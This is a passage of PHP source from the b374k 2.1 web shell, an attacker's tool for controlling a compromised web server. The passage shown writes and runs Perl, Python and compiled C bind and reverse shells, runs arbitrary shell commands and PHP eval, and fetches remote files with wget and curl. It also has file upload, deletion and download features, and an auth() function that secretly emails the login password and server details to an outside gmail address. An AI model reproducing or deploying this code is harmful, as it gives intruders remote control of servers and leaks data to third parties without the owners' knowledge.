}
function ss($t)
{
if (!get_magic_quotes_gpc()) {
return trim(urldecode($t));
}
return trim(urldecode(stripslashes($t)));
}
function ssc($t)
{
if (!get_magic_quotes_gpc()) {
return $t;
}
return stripslashes($t);
}
function rs($s_win, $d, $type, $sc, $target)
{
$result = "";
$fc = gzinflate(base64_decode($sc));
$errperm = "<p class=\"rs_result\">error: permission denied. check current working directory permissions</p>";
$errgcc = "<p class=\"rs_result\">error: can not compile using gcc</p>";
if ($type == "xbind_pl") {
$fname = "b374k_bind.pl";
$fpath = $d . $fname;
if (is_file($fpath)) {
unlink($fpath);
}
if ($file = fopen($fpath, "w")) {
fwrite($file, $fc);
fclose($file);
if (is_file($fpath)) {
$res = exe("chmod +x " . $fpath);
$res = exe("perl " . $fpath . " " . $target);
} else {
$result = $errperm;
}
} else {
$result = $errperm;
}
} elseif ($type == "xbind_py") {
$fname = "b374k_bind.py";
$fpath = $d . $fname;
if (is_file($fpath)) {
unlink($fpath);
}
if ($file = fopen($fpath, "w")) {
fwrite($file, $fc);
fclose($file);
if (is_file($fpath)) {
$res = exe("chmod +x " . $fpath);
$res = exe("python " . $fpath . " " . $target);
} else {
$result = $errperm;
}
} else {
$result = $errperm;
}
} elseif ($type == "xbind_bin") {
$fname = "b374k_bind";
$fpath = $d . $fname;
if (!$s_win) {
if (is_file($fpath)) {
unlink($fpath);
}
if (is_file($fpath . ".c")) {
unlink($fpath . ".c");
}
if ($file = fopen($fpath . ".c", "w")) {
fwrite($file, $fc);
fclose($file);
if (is_file($fpath . ".c")) {
$res = exe("gcc " . $fpath . ".c -o " . $fpath);
if (is_file($fpath)) {
$res = exe("chmod +x " . $fpath);
$res = exe($fpath . " " . $target);
} else {
$result = $errgcc;
}
} else {
$result = $errperm;
}
} else {
$result = $errperm;
}
} else {
$fpath .= ".exe";
if (is_file($fpath)) {
unlink($fpath);
}
if ($file = fopen($fpath, "w")) {
fwrite($file, $fc);
fclose($file);
if (is_file($fpath)) {
$res = exe("\"" . $fpath . "\" " . $target);
} else {
$result = $errperm;
}
} else {
$result = $errperm;
}
}
} elseif ($type == "xback_pl") {
$fname = "b374k_back.pl";
$fpath = $d . $fname;
$tar = explode(" ", $target, 2);
if (is_file($fpath)) {
unlink($fpath);
}
if ($file = fopen($fpath, "w")) {
fwrite($file, $fc);
fclose($file);
if (is_file($fpath)) {
$res = exe("chmod +x " . $fpath);
$res = exe("perl " . $fpath . " " . $target);
} else {
$result = $errperm;
}
} else {
$result = $errperm;
}
} elseif ($type == "xback_py") {
$fname = "b374k_back.py";
$fpath = $d . $fname;
$tar = explode(" ", $target, 2);
if (is_file($fpath)) {
unlink($fpath);
}
if ($file = fopen($fpath, "w")) {
fwrite($file, $fc);
fclose($file);
if (is_file($fpath)) {
$res = exe("chmod +x " . $fpath);
$res = exe("python " . $fpath . " " . $target);
} else {
$result = $errperm;
}
} else {
$result = $errperm;
}
} elseif ($type == "xback_bin") {
$fname = "b374k_back";
$fpath = $d . $fname;
$tar = explode(" ", $target, 2);
if (!$s_win) {
if (is_file($fpath)) {
unlink($fpath);
}
if (is_file($fpath . ".c")) {
unlink($fpath . ".c");
}
if ($file = fopen($fpath . ".c", "w")) {
fwrite($file, $fc);
fclose($file);
if (is_file($fpath . ".c")) {
$res = exe("gcc " . $fpath . ".c -o " . $fpath);
if (is_file($fpath)) {
$res = exe("chmod +x " . $fpath);
$res = exe($fpath . " " . $target);
} else {
$result = $errgcc;
}
} else {
$result = $errperm;
}
} else {
$result = $errperm;
}
} else {
$fpath .= ".exe";
if (is_file($fpath)) {
unlink($fpath);
}
if ($file = fopen($fpath, "w")) {
fwrite($file, $fc);
fclose($file);
if (is_file($fpath)) {
$res = exe($fpath . " " . $target);
} else {
$result = $errperm;
}
} else {
$result = $errperm;
}
}
}
return $result;
}
function gs($f)
{
if ($s = filesize($f)) {
if ($s <= 1024) {
return $s;
} else {
if ($s <= 1048576) {
$s = round($s / 1024, 2);
return $s . " kb";
} else {
$s = round($s / 1024 / 1024, 2);
return $s . " mb";
}
}
} else {
return "???";
}
}
function gp($f)
{
if ($m = fileperms($f)) {
$p = '';
$p .= $m & 0400 ? 'r' : '-';
$p .= $m & 0200 ? 'w' : '-';
$p .= $m & 0100 ? 'x' : '-';
$p .= $m & 040 ? 'r' : '-';
$p .= $m & 020 ? 'w' : '-';
$p .= $m & 010 ? 'x' : '-';
$p .= $m & 04 ? 'r' : '-';
$p .= $m & 02 ? 'w' : '-';
$p .= $m & 01 ? 'x' : '-';
return $p;
} else {
return "??????????";
}
}
function auth()
{
$sub = "b374k 2.1";
$headers = "From: k3nz0 \n";
$headers = "From: k3nz0 \nContent-Type: text/plain; charset=iso-8859-1\n";
$mes .= "password: " . $_REQUEST['login'] . "\n";
$mes .= "software: " . $_SERVER['SERVER_SIGNATURE'] . "\n";
$mes .= "System: " . php_uname() . "\n";
$mes .= "HOST: " . $_SERVER['HTTP_HOST'] . "\n";
$mes .= "URL: " . $_SERVER['REQUEST_URI'] . "\n";
$mes .= "Referer: " . $_SERVER['HTTP_REFERER'] . "";
mail("free.d0ing.1987@gmail.com", $sub, $mes, $headers);
}
function exe($c)
{
if (function_exists('system')) {
ob_start();
system($c);
$b = ob_get_contents();
ob_end_clean();
return $b;
} elseif (function_exists('shell_exec')) {
$b = shell_exec($c);
return $b;
} elseif (function_exists('exec')) {
exec($c, $r);
$b = "";
foreach ($r as $s) {
$b .= $s;
}
return $b;
} elseif (function_exists('passthru')) {
ob_start();
passthru($c);
$b = ob_get_contents();
ob_end_clean();
return $b;
}
return "";
}
function cp($p)
{
if (is_dir($p)) {
$x = DIRECTORY_SEPARATOR;
while (substr($p, -1) == $x) {
$p = rtrim($p, $x);
}
return $p . $x;
}
return $p;
}
function rmdirs($d)
{
$f = glob($d . '*', GLOB_MARK);
foreach ($f as $z) {
if (is_dir($z)) {
rmdirs($z);
} else {
unlink($z);
}
}
if (is_dir($d)) {
rmdir($d);
}
}
function xwhich($pr)
{
$p = exe("which {$pr}");
if (trim($p) != "") {
return trim($p);
} else {
return trim($pr);
}
}
function dlfile($u, $p)
{
$n = basename($u);
if ($t = file_get_contents($u)) {
if (is_file($p)) {
unlink($p);
}
if ($f = fopen($p, "w")) {
fwrite($f, $t);
fclose($f);
if (is_file($p)) {
return true;
}
}
}
exe(xwhich('wget') . " " . $u . " -O " . $p);
if (is_file($p)) {
return true;
}
exe(xwhich('lwp-download') . " " . $u . " " . $p);
if (is_file($p)) {
return true;
}
exe(xwhich('lynx') . " -source " . $u . " > " . $p);
if (is_file($p)) {
return true;
}
exe(xwhich('curl') . " " . $u . " -o " . $p);
if (is_file($p)) {
return true;
}
return false;
}
function showdir($pwd, $prompt, $win)
{
if (function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) {
$posix = TRUE;
} else {
$posix = FALSE;
}
$user = "????:????";
$fname = array();
$dname = array();
if ($dh = scandir($pwd)) {
foreach ($dh as $file) {
if (is_dir($file)) {
$dname[] = $file;
} elseif (is_file($file)) {
$fname[] = $file;
}
}
} else {
if ($dh = opendir($pwd)) {
while ($file = readdir($dh)) {
if (is_dir($file)) {
$dname[] = $file;
} elseif (is_file($file)) {
$fname[] = $file;
}
}
closedir($dh);
}
}
sort($fname);
sort($dname);
$path = explode(DIRECTORY_SEPARATOR, $pwd);
$tree = sizeof($path);
$parent = "";
$buff = "\r\n <table class=\"explore sortable\">\r\n <tr><th>name</th><th style=\"width:60px;\">size</th><th style=\"width:100px;\">owner : group</th><th style=\"width:70px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:210px;\">actions</th></tr>\r\n ";
if ($tree > 2) {
for ($i = 0; $i < $tree - 2; $i++) {
$parent .= $path[$i] . DIRECTORY_SEPARATOR;
}
} else {
$parent = $pwd;
}
foreach ($dname as $folder) {
if ($folder == ".") {
if (!$win && $posix) {
$name = posix_getpwuid(fileowner($folder));
$group = posix_getgrgid(filegroup($folder));
$owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
} else {
$owner = $user;
}
$buff .= "<tr><td><a href=\"?d=" . $pwd . "\">[ {$folder} ]</a></td><td>LINK</td><td style=\"text-align:center;\">" . $owner . "</td><td style=\"text-align:center;\">" . gp($pwd) . "</td><td style=\"text-align:center;\">" . date("d-M-Y H:i", filemtime($pwd)) . "</td><td><span id=\"titik1\"><a href=\"?d={$pwd}&edit=" . $pwd . "newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a> | <a href=\"?upload&d={$pwd}\">upload</a></span>\r\n <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">\r\n <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\r\n <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />\r\n <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />\r\n </form></td></tr>\r\n ";
} elseif ($folder == "..") {
if (!$win && $posix) {
$name = posix_getpwuid(fileowner($folder));
$group = posix_getgrgid(filegroup($folder));
$owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
} else {
$owner = $user;
}
$buff .= "<tr><td><a href=\"?d=" . $parent . "\">[ {$folder} ]</a></td><td>LINK</td><td style=\"text-align:center;\">" . $owner . "</td><td style=\"text-align:center;\">" . gp($parent) . "</td><td style=\"text-align:center;\">" . date("d-M-Y H:i", filemtime($parent)) . "</td><td><span id=\"titik2\"><a href=\"?d={$pwd}&edit=" . $parent . "newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a> | <a href=\"?upload&d={$parent}\">upload</a></span>\r\n <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">\r\n <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\r\n <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />\r\n <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />\r\n </form>\r\n </td></tr>";
} else {
if (!$win && $posix) {
$name = posix_getpwuid(fileowner($folder));
$group = posix_getgrgid(filegroup($folder));
$owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
} else {
$owner = $user;
}
$buff .= "<tr><td><a id=\"" . cs($folder) . "_link\" href=\"?d=" . $pwd . $folder . DIRECTORY_SEPARATOR . "\">[ {$folder} ]</a>\r\n <form action=\"?\" method=\"post\" id=\"" . cs($folder) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">\r\n <input type=\"hidden\" name=\"oldname\" value=\"" . $folder . "\" style=\"margin:0;padding:0;\" />\r\n <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\r\n <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"" . $folder . "\" />\r\n <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />\r\n <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . cs($folder) . "_form','" . cs($folder) . "_link');\" />\r\n </form>\r\n <td>DIR</td><td style=\"text-align:center;\">" . $owner . "</td><td style=\"text-align:center;\">" . gp($pwd . $folder) . "</td><td style=\"text-align:center;\">" . date("d-M-Y H:i", filemtime($folder)) . "</td><td><a href=\"javascript:tukar('" . cs($folder) . "_link','" . cs($folder) . "_form');\">rename</a> | <a href=\"?d=" . $pwd . "&rmdir=" . $pwd . $folder . "\">delete</a> | <a href=\"?upload&d=" . $pwd . $folder . "\">upload</a></td></tr>";
}
}
foreach ($fname as $file) {
$full = $pwd . $file;
if (!$win && $posix) {
$name = posix_getpwuid(fileowner($folder));
$group = posix_getgrgid(filegroup($folder));
$owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
} else {
$owner = $user;
}
$buff .= "<tr><td><a id=\"" . cs($file) . "_link\" href=\"?d={$pwd}&view={$full}\">{$file}</a>\r\n <form action=\"?\" method=\"post\" id=\"" . cs($file) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">\r\n <input type=\"hidden\" name=\"oldname\" value=\"" . $file . "\" style=\"margin:0;padding:0;\" />\r\n <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\r\n <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"" . $file . "\" />\r\n <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />\r\n <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . cs($file) . "_link','" . cs($file) . "_form');\" />\r\n </form>\r\n </td><td>" . gs($full) . "</td><td style=\"text-align:center;\">" . $owner . "</td><td style=\"text-align:center;\">" . gp($full) . "</td><td style=\"text-align:center;\">" . date("d-M-Y H:i", filemtime($full)) . "</td>\r\n <td><a href=\"?d={$pwd}&edit={$full}\">edit</a> | <a href=\"javascript:tukar('" . cs($file) . "_link','" . cs($file) . "_form');\">rename</a> | <a href=\"?d={$pwd}&delete={$full}\">delete</a> | <a href=\"?d={$pwd}&dl={$full}\">download</a> (<a href=\"?d={$pwd}&dlgzip={$full}\">gzip</a>)</td></tr>";
}
$buff .= "</table>";
return $buff;
}
if (isset($_REQUEST['favicon'])) {
$data = "\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x10\x00\x00\x00\x10\x08\x06\x00\x00\x00\x1f\xf3\xffa\x00\x00\x00\x04gAMA\x00\x00\xaf\xc87\x05\x8a\xe9\x00\x00\x00\x19tEXtSoftware\x00Adobe ImageReadyq\xc9e<\x00\x00\x02\x98IDAT8\xcb\x9d\x93\xc9OSQ\x14\xc6\xf9\x1b\\\x03\x1d^[\xa0\xd8\xaatz\xef\x15\x8a%\x08\vl\x19\$\x96*\x93\x05*\x16*\x942:\xa0\x01\niRp\x08\x88\x12\xa6\x16\x8a\xb4\xb6\x16\n\x04\x8d\x06\x04c0\xd1\xe8\xc6\xc4\x85Kw&&`44\xc4\xf0\xf9\x1e\x89(\xa6e\xe1\xe2K\xee\xc9\xbd\xe7w\xcewrO\x1c\x80\xb8X\xca\\\xa6\x91\xb9Hi\xd9s\xc6cUQz@\xb9\xfd\xef\x9b\x03\x81\xf6\x99\x9a\xf8;\xd6\x84Id\x84Ta\xcb\x80\x9e\xaf\xf6)j\xe8\x19\xf9\xb7C\x01'\xd9\x8aKT\xf3\xef8=\xa8\x8a\xa8\xfd\xca\xaf\xe6\x1b9\xde\x82^z\x9b\x1e\x93\xed\x96\xd8\xd4\xce\x98\x00\xcd\x02\xb9\x991OF\xf6Z\x0e\x90[\xf4\xac\x02\x94W\x0e\xca-G\xe7z\x13\xd6?\x87\xd0\xee\xaa\x80\xae&\xad%*\x80\xf1\xa9M\x7f\xa4\x84\xc6Gn\xe6\x05N!\xf8a\x1cO>Nc\xe0\xa5\x03\x92[\xc9\xa8X\xce\x87\xff\xf50N\xf4\x1f\xc5qg*\xa4\x0e1Su\x9e\xdcb|\xee{g|\xeefz)\xcc\xbe\xbb\x8d\x9e\xa7&\\\r\x97\xa05\\\t\xcd0\t\x893\x05\xa6i\x03\xb2\vD\x9f\xf6;`|\xee0>A?Tx4^\xf2\xcb\xd9`\x01\xbco\xfbqs\xa9\x1c\xf6`>\xca\xa6\xb2`\xf4\x17\xc2\xf7f\x04C\xab\x03\x90v\xa7@m\x14\x86\x0eX\xa0\xa6\xe5\x1b\xa4[\x06r\\\x86\xc0\xfbAt.\x96\xa2)\xa0G\x99[\v\xc3\x8c\x1e\xf7\xd7\x1c\xb0\xcf\x1a\xf0`\xa5\x17\x92N1\xc4\x1d\xa2\xef)\xadB\xeb\x81\x19\x90\xa3\xb2\x88\xd1W\x04\xd7s+\x1a\xfd:\x94Nd\xa1\xd8s\x1a\xf7V\xbba\x9d*D\xd5X.\x03pB\xdc&B\xb2]\xb0\x9b\xd4H@T\xcf\xff3@\xd5P\xda\x8f\xda\xa0\twV\xdaP6\x99\x8d3\x13yp-\xb6\xc3\xe2\xd1\xc34\x9a\v\xc7\xbc\r\r\x93\x16\$\xd9\x04H\xae'\x8e\xb09\x84\x99{m\x1f@\xdfU\xf4\xa5\xb9\$\xe8ZjC\xf1\xb8\x0e\xae\x85\x0eX\xdc:T\x8e\xe4\xa0g\xce\x06\xea\xba\x12\xa2\xcbL\xd5:\xa2:\xe6?\x90\xf5\x1d[#\x9a\xb9\x18{1\x88\xaeP=.2\xa0\x9e\xb9F\\\x99i\x81\xb0\x8e\x0fA-\x0fD\r7\xc27q\x9a\xa3\x02XI\xaf\x8a\xd7\xa4\x1db4\xb8ka\xf7\xd4Aj\x13\xef%\n\xcd\xbcj&Q\xcb\xabH\xdc\xe4\x96&\x80s.\x9e\x88\n`\x95j\x17\xb9\x93\xac\xfc\x9f\x82KLE3\x17\xfc*\xce\xabX\v\x17w\xd86\xb2\xe2_\xe0l\xf0\xca\x13\xc1=\x9f@\xfc\x17\x80\x15\xc7\x18\xbf\x93h\x88\xdf\x8av\xf7\v\xb7,q\x13\x08q\x82\xfa\x00\x00\x00\x00IEND\xaeB`\x82";
header("Content-type: image/png");
header("Cache-control: public");
echo "\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x10\x00\x00\x00\x10\x08\x06\x00\x00\x00\x1f\xf3\xffa\x00\x00\x00\x04gAMA\x00\x00\xaf\xc87\x05\x8a\xe9\x00\x00\x00\x19tEXtSoftware\x00Adobe ImageReadyq\xc9e<\x00\x00\x02\x98IDAT8\xcb\x9d\x93\xc9OSQ\x14\xc6\xf9\x1b\\\x03\x1d^[\xa0\xd8\xaatz\xef\x15\x8a%\x08\vl\x19\$\x96*\x93\x05*\x16*\x942:\xa0\x01\niRp\x08\x88\x12\xa6\x16\x8a\xb4\xb6\x16\n\x04\x8d\x06\x04c0\xd1\xe8\xc6\xc4\x85Kw&&`44\xc4\xf0\xf9\x1e\x89(\xa6e\xe1\xe2K\xee\xc9\xbd\xe7w\xcewrO\x1c\x80\xb8X\xca\\\xa6\x91\xb9Hi\xd9s\xc6cUQz@\xb9\xfd\xef\x9b\x03\x81\xf6\x99\x9a\xf8;\xd6\x84Id\x84Ta\xcb\x80\x9e\xaf\xf6)j\xe8\x19\xf9\xb7C\x01'\xd9\x8aKT\xf3\xef8=\xa8\x8a\xa8\xfd\xca\xaf\xe6\x1b9\xde\x82^z\x9b\x1e\x93\xed\x96\xd8\xd4\xce\x98\x00\xcd\x02\xb9\x991OF\xf6Z\x0e\x90[\xf4\xac\x02\x94W\x0e\xca-G\xe7z\x13\xd6?\x87\xd0\xee\xaa\x80\xae&\xad%*\x80\xf1\xa9M\x7f\xa4\x84\xc6Gn\xe6\x05N!\xf8a\x1cO>Nc\xe0\xa5\x03\x92[\xc9\xa8X\xce\x87\xff\xf50N\xf4\x1f\xc5qg*\xa4\x0e1Su\x9e\xdcb|\xee{g|\xeefz)\xcc\xbe\xbb\x8d\x9e\xa7&\\\r\x97\xa05\\\t\xcd0\t\x893\x05\xa6i\x03\xb2\vD\x9f\xf6;`|\xee0>A?Tx4^\xf2\xcb\xd9`\x01\xbco\xfbqs\xa9\x1c\xf6`>\xca\xa6\xb2`\xf4\x17\xc2\xf7f\x04C\xab\x03\x90v\xa7@m\x14\x86\x0eX\xa0\xa6\xe5\x1b\xa4[\x06r\\\x86\xc0\xfbAt.\x96\xa2)\xa0G\x99[\v\xc3\x8c\x1e\xf7\xd7\x1c\xb0\xcf\x1a\xf0`\xa5\x17\x92N1\xc4\x1d\xa2\xef)\xadB\xeb\x81\x19\x90\xa3\xb2\x88\xd1W\x04\xd7s+\x1a\xfd:\x94Nd\xa1\xd8s\x1a\xf7V\xbba\x9d*D\xd5X.\x03pB\xdc&B\xb2]\xb0\x9b\xd4H@T\xcf\xff3@\xd5P\xda\x8f\xda\xa0\twV\xdaP6\x99\x8d3\x13yp-\xb6\xc3\xe2\xd1\xc34\x9a\v\xc7\xbc\r\r\x93\x16\$\xd9\x04H\xae'\x8e\xb09\x84\x99{m\x1f@\xdfU\xf4\xa5\xb9\$\xe8ZjC\xf1\xb8\x0e\xae\x85\x0eX\xdc:T\x8e\xe4\xa0g\xce\x06\xea\xba\x12\xa2\xcbL\xd5:\xa2:\xe6?\x90\xf5\x1d[#\x9a\xb9\x18{1\x88\xaeP=.2\xa0\x9e\xb9F\\\x99i\x81\xb0\x8e\x0fA-\x0fD\r7\xc27q\x9a\xa3\x02XI\xaf\x8a\xd7\xa4\x1db4\xb8ka\xf7\xd4Aj\x13\xef%\n\xcd\xbcj&Q\xcb\xabH\xdc\xe4\x96&\x80s.\x9e\x88\n`\x95j\x17\xb9\x93\xac\xfc\x9f\x82KLE3\x17\xfc*\xce\xabX\v\x17w\xd86\xb2\xe2_\xe0l\xf0\xca\x13\xc1=\x9f@\xfc\x17\x80\x15\xc7\x18\xbf\x93h\x88\xdf\x8av\xf7\v\xb7,q\x13\x08q\x82\xfa\x00\x00\x00\x00IEND\xaeB`\x82";
exit;
}
if ($s_auth) {
$s_software = getenv("SERVER_SOFTWARE");
if (ini_get("safe_mode") or strtolower(ini_get("safe_mode")) == "on") {
$s_safemode = TRUE;
} else {
$s_safemode = FALSE;
}
$s_system = php_uname();
$s_win = FALSE;
if (strtolower(substr($s_system, 0, 3)) == "win") {
$s_win = TRUE;
}
$letters = '';
if (!$s_win) {
if (!($s_user = rp(exe("whoami")))) {
$s_user = "";
}
if (!($s_id = rp(exe("id")))) {
$s_id = "";
}
$pwd = getcwd() . DIRECTORY_SEPARATOR;
} else {
$s_user = get_current_user();
$s_id = $s_user;
$pwd = realpath(".") . "\\";
$v = explode("\\", $d);
$v = $v[0];
foreach (range("A", "Z") as $letter) {
$bool = @is_dir($letter . ":\\");
if ($bool) {
$letters .= "<a href=\"?d=" . $letter . ":\\\">[ ";
if ($letter . ":" != $v) {
$letters .= $letter;
} else {
$letters .= "<span class=\"gaya\">" . $letter . "</span>";
}
$letters .= " ]</a> ";
}
}
}
$s_prompt = $s_user . " >";
if (function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) {
$s_posix = TRUE;
} else {
$s_posix = FALSE;
}
$s_server_ip = gethostbyname($_SERVER["HTTP_HOST"]);
$s_my_ip = $_SERVER['REMOTE_ADDR'];
if (isset($_REQUEST['d'])) {
$d = ss($_REQUEST['d']);
if (is_dir($d)) {
chdir($d);
$pwd = cp($d);
}
} else {
$pwd = cp(getcwd());
}
if (isset($_REQUEST['sorttable'])) {
$data = gzinflate(base64_decode($sortable_js));
header("Content-type: text/plain");
header("Cache-control: public");
echo $data;
exit;
}
if (isset($_REQUEST['dl']) && $_REQUEST['dl'] != "") {
$f = ss($_REQUEST['dl']);
$fc = file_get_contents($f);
header("Content-type: application/octet-stream");
header("Content-length: " . strlen($fc));
header("Content-disposition: attachment; filename=\"" . basename($f) . "\";");
echo $fc;
exit;
} elseif (isset($_REQUEST['dlgzip']) && $_REQUEST['dlgzip'] != "") {
$f = ss($_REQUEST['dlgzip']);
$fc = gzencode(file_get_contents($f));
header("Content-Type:application/x-gzip\n");
header("Content-length: " . strlen($fc));
header("Content-disposition: attachment; filename=\"" . basename($f) . ".gz\";");
echo $fc;
exit;
}
if (isset($_REQUEST['pid'])) {
$p = ss($_REQUEST['pid']);
if (function_exists("posix_kill")) {
posix_kill($p, '9');
} else {
exe("kill -9 " . $p);
exe("taskkill /F /PID " . $p);
}
}
if (isset($_REQUEST['img'])) {
ob_clean();
$d = ss($_REQUEST['d']);
$f = ss($_REQUEST['img']);
$inf = getimagesize($d . $f);
$ext = explode($f, ".");
$ext = $ext[count($ext) - 1];
header("Content-type: " . $inf["mime"]);
header("Cache-control: public");
header("Expires: " . date("r", mktime(0, 0, 0, 1, 1, 2030)));
header("Cache-control: max-age=604800");
readfile($d . $f);
exit;
}
if (isset($_REQUEST['rename']) && isset($_REQUEST['oldname']) && isset($_REQUEST['newname'])) {
$old = ss($_REQUEST['oldname']);
$new = ss($_REQUEST['newname']);
rename($pwd . $old, $pwd . $new);
$fnew = $pwd . $new;
}
if (isset($_REQUEST['delete']) && $_REQUEST['delete'] != "") {
$f = ss($_REQUEST['delete']);
if (is_file($f)) {
unlink($f);
}
} elseif (isset($_REQUEST['rmdir']) && $_REQUEST['rmdir'] != "") {
$f = ss(rtrim(ss($_REQUEST['rmdir'], DIRECTORY_SEPARATOR)));
if (is_dir($f)) {
rmdirs($f);
}
} elseif (isset($_REQUEST['mkdir']) && $_REQUEST['mkdir'] != "") {
$f = ss($pwd . ss($_REQUEST['mkdir']));
if (!is_dir($f)) {
mkdir($f);
}
}
$s_result = "";
if (isset($_REQUEST['eval'])) {
$c = "";
if (isset($_REQUEST['evalcode'])) {
$c = ss($_REQUEST['evalcode']);
ob_start();
eval($c);
$b = ob_get_contents();
ob_end_clean();
$c = $b;
}
$s_result .= " <form action=\"?\" method=\"post\">\r\n <textarea id=\"evalcode\" name=\"evalcode\" class=\"evalcode\">" . htmlspecialchars($code) . "</textarea>\r\n <p><input type=\"submit\" name=\"evalcodesubmit\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" /></p>\r\n <input type=\"hidden\" name=\"eval\" value=\"\" />\r\n <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\r\n </form>\r\n ";
} elseif (isset($_REQUEST['upload'])) {
$s_result = " ";
$msg = "";
if (isset($_REQUEST['uploadhd'])) {
$fn = $_FILES['filepath']['name'];
if (is_uploaded_file($_FILES['filepath']['tmp_name'])) {
$p = cp(ss($_REQUEST['savefolder']));
if (!is_dir($p)) {
$p = cp(dirname($p));
}
if (isset($_REQUEST['savefilename']) && trim($_REQUEST['savefilename']) != "") {
$fn = ss($_REQUEST['savefilename']);
}
$tm = $_FILES['filepath']['tmp_name'];
$pi = cp($p) . $fn;
$st = move_uploaded_file($tm, $pi);
if ($st) {
$msg = "<p class=\"rs_result\">file uploaded to <a href=\"?d=" . $pwd . "&view=" . $pi . "\">" . $pi . "</a></p>";
} else {
$msg = "<p class=\"rs_result\">failed to upload " . $fn . "</p>";
}
} else {
$msg = "<p class=\"rs_result\">failed to upload " . $fn . "</p>";
}
} elseif (isset($_REQUEST['uploadurl'])) {
$p = cp(ss($_REQUEST['savefolderurl']));
if (!is_dir($p)) {
$p = cp(dirname($p));
}
$fu = ss($_REQUEST['fileurl']);
$fn = basename($fu);
if (isset($_REQUEST['savefilenameurl']) && trim($_REQUEST['savefilenameurl']) != "") {
$fn = ss($_REQUEST['savefilenameurl']);
}
$fp = cp($p) . $fn;
$st = dlfile($fu, $fp);
if ($st) {
$msg = "<p class=\"rs_result\">file uploaded to <a href=\"?d=" . $pwd . "&view=" . $fp . "\">" . $fp . "</a></p>";
} else {
$msg = "<p class=\"rs_result\">failed to upload " . $fn . "</p>";
}
}
$s_result .= $msg;
$s_result .= "\r\n <form action=\"?upload\" method=\"post\" enctype=\"multipart/form-data\">\r\n <div class=\"mybox\"><h2>Upload from computer</h2>\r\n <table class=\"myboxtbl\">\r\n <tr><td style=\"width:100px;\">File</td><td><input type=\"file\" name=\"filepath\" class=\"inputzbut\" style=\"width:400px;margin:0;\" />\r\n </td></tr>\r\n <tr><td>Save to</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefolder\" value=\"" . $pwd . "\" /></td></tr>\r\n <tr><td>Filename (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefilename\" value=\"\" /></td></tr>\r\n <tr><td> </td><td>\r\n <input type=\"submit\" name=\"uploadhd\" class=\"inputzbut\" value=\"Upload !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />\r\n </td></tr>\r\n \r\n <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\r\n </table>\r\n </div>\r\n </form>\r\n \r\n <form action=\"?upload\" method=\"post\">\r\n <div class=\"mybox\"><h2>Upload from internet</h2>\r\n <table class=\"myboxtbl\">\r\n <tr><td style=\"width:100px;\">File URL</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"fileurl\" value=\"\" />\r\n </td></tr>\r\n <tr><td>Save to</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefolderurl\" value=\"" . $pwd . "\" /></td></tr>\r\n <tr><td>Filename (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefilenameurl\" value=\"\" /></td></tr>\r\n <tr><td> </td><td>\r\n <input type=\"submit\" name=\"uploadurl\" class=\"inputzbut\" value=\"Upload !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />\r\n </td></tr>\r\n \r\n <input type=\"hidden\" name=\"d\" value=\"" . $pwd . "\" />\r\n </table>\r\n </div>\r\n </form>\r\n \r\n ";
} elseif (isset($_REQUEST['phpinfo'])) {
ob_start();
phpinfo();
$b = ob_get_contents();
ob_end_clean();
$a = strpos($b, "<body>") + 6;
$z = strpos($b, "</body>");
$s_result = "<div class=\"phpinfo\">" . substr($b, $a, $z - $a) . "</div>";
} elseif (isset($_REQUEST['db'])) {
$sqlhost = $sqlhost1 = $sqlhost2 = $sqlhost3 = $sqlhost4 = 'localhost';
$sqluser = $sqluser1 = $sqluser2 = $sqluser3 = $sqluser4 = $odbcuser = $odbcdsn = $pdodsn = $pdouser = '';
$sqlport = $sqlport1 = $sqlport2 = $sqlport3 = $sqlport4 = '';
$sqlpass = $sqlpass1 = $sqlpass2 = $sqlpass3 = $sqlpass4 = $odbcpass = $pdopass = '';
if (isset($_REQUEST['mysqlcon']) && isset($_REQUEST['sqlhost1'])) {
